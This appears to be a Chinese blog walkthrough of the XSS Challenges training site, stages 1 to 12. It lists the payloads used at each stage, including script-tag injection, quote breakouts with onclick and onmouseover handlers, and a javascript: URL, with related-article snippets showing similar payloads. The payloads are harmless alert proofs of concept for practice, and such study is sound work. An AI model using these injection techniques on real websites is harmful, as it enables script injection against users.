xss-change通关 1-12

最新推荐文章于 2024-02-28 19:07:06 发布
最新推荐文章于 2024-02-28 19:07:06 发布
阅读量356 收藏 1
点赞数 2
分类专栏: 从零开始的CTF学习之路 文章标签: xss web安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61823031/article/details/124819420
版权

地址:http://xss-quiz.int21h.jp/?sid=02ece25c340e36666a2c09b99f0cf3a289d7adfe

1 第一关

直接输入输入playload就可以通过。

``<script>alert(document.domain)</script>

在这里插入图片描述

在这里插入图片描述

2 第二关

需要闭合一个标签,输入

"><script>alert(document.domain)</script>

在这里插入图片描述

在这里插入图片描述

第三关

这里是在此处进行插入

<script>alert(document.domain)</script>

在这里插入图片描述

在这里插入图片描述

第四关

抓包,通过p3提交

""><script>alert(document.domain)</script>

在这里插入图片描述

第五关

修改长度后输入ployed即可。

"><script>alert(document.domain)</script>

在这里插入图片描述

第六关

先输入 "> ,发现<>被过滤了。
在这里插入图片描述
换个思路,既然闭合不了那就加个属性:

" οnclick=alert(document.domain) id="a

在这里插入图片描述

第七关

输入ployload

" οnclick=alert(document.domain) id="a

可以出发弹窗,但这里的value和之前的不一样,是因为这里对"进行了过滤,所以"能出现在value后面。

在这里插入图片描述

第八关

提示使用JavaScript协议。
在这里插入图片描述
没有什么过滤,可以直接弹窗

javascript:alert(document.domain)

第九关

提示使用utf-7的编码来绕过,这里使用其他方式绕过。
在这里插入图片描述
简单粗暴直接绕过。
在这里插入图片描述

第十关

对domain进行了过滤,将它替换成了空字符,这里我们输入payload

">
在这里插入图片描述

第十二关

第十一关不知道为啥进不去。
啥也过滤了,不知道怎么搞。
上网查询后了解到,ie浏览器会把单引号识别为双引号

οnclick=alert(document.domain) οnmοuseοver=alert(document.domain);

Day-3
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xss challenges闯关详细(6-10)
zsynbw的博客
10-28 584
xss challenges闯关详细
xss challenges闯关 1-10
夜思红尘的博客
04-12 432
xss challenges闯关 1-10
XSS过关挑战之xss-challenge
good good study
03-14 5273
目录 一. 描述 二. 通关 level 1 level2 level3 终极测试代码 level4 level5 level6 level7 level8 level9 level10 一. 描述 xsschange是一个xss过滤的绕过通关靶场,总共有20关,通过其可以进行练习如何绕过xss的过滤。将文件放在网站目录下进行访问即可,如下 下载地址:传送门 -》xss-challenge 二. 通关 level 1 点击图片进入第一关1,看到,通过get的方式进行
xss Challenge 题解
为之的博客
02-16 526
第一关 <script>alert(document.domain)</script> 第二关 用第一关的代码试了下,看源码发现直接赋值到value上,所以可以对value括号闭合 "><script>alert(document.domain)</script> 第三关 多了个选择框,前面一个输入框怎么输都没...
XSS Challenges通关教程
qq_48904485的博客
03-22 833
Stage #1 1、输入特殊字符判断位置 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cyrE8xMh-1647921893877)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211106215932680.png)] 2、构造Payload "</b><script>alert(document.domain);</script> Stage #
XSS Challenge 通关思路(更新中)
最新发布
weixin_48803338的博客
02-28 1115
XSS(CSS):全称叫“跨站脚本(js)攻击”。指攻击者在网站页面注入恶意脚本,使其在用户浏览页面时执行。XSS危害:1.盗取cookie(用户的身份认证)2.非法转账 3.钓鱼等XSS分类:反射型:插入的恶意js代码没有放在数据库中存储型:插入的恶意js代码存放在数据库中。
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-lab全通关教程
05-07
总的来说,这份“XSS-lab全通关教程”是一套全面的XSS学习资料,适用于前端开发者、安全研究人员以及对网络安全感兴趣的任何人。通过深入学习和实践,你可以掌握如何检测、预防和修复XSS漏洞,提升你在网络安全领域...
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
32个触发事件XSS语句的总结
weixin_33788244的博客
01-26 442
作者为monyer 1、onmouseenter:当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert('bem')">123456</div> 2、onmouseleave:当鼠标离开选区执行代码 <DIV style="BACKGROUND-COLO...
XSS进阶小教程
18年3月萌新白帽子
02-25 3935
一、在了解XSS之前,我们首先需要先了解一下HTML 与 JavaScript 自解码机制。 1、HTML的自解码机制 浏览器在解析HTML标签属性值内的代码前,会先对下列两种编码进行解码,然后再对属性中的代码进行解析。 (1)、进制解码:&#xH;(十六进制格式)、&#D;(十进制格式)。编码中最后的分号(;)可以不要。且16进制中用来表示10~15的a~f对大...
BTS测试实验室 --- xss攻略
wkend的博客
11-02 713
ox00反射型 挑战1 payload:&amp;amp;lt;script&amp;amp;gt;alert('xss')&amp;amp;lt;/script&amp;amp;gt; 挑战2 通过尝试发现页面会发生变化,而且参数在url中可见且可控 url:http://127.0.0.1/btslab/vulnerability/xss/xss2.php?clr=%23000&amp;amp;amp;Change=%E5%88%87%E6%8D%A2 改变参数
XSS介绍与攻击
:)每天进步一点点
02-21 1703
XSS总览: Cross-Site Scripting attacks are a type of injectionproblem, in which malicious scripts are injected into the otherwise benign andtrusted web sites. Flaws that allow these attacks to succeed
Hidden属性的input标签中XSS的触发方法
热门推荐
CC's Blog
03-31 1万+
今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:<input type="hidden" name="returnurl" value="[USER INJECT]" />正常情况下的XSS应当是: http://victim/?value=” onclick=”alert(document.domain) 但是这里由于该input 未在页面中显示,常用
XSS跨站脚本小结
07-05 159
Xss概念 同源策略 javaScript中的同源,需要对比 两者中的协议、域名、端口。三者完全相同才认为是同源的,否则即是来自不同源的内容。 Xss概念 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 用户提交的数据没有过滤,或者过滤不严格,输出到网页中 ,导致可以构造执行...
xss-labs通关
09-11
对于 xss-labs 的通关,我可以提供一些基本的指导。首先,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过插入恶意脚本来利用网站上的用户。要通关 xss-labs,您需要了解并掌握以下内容: 1. XSS 攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值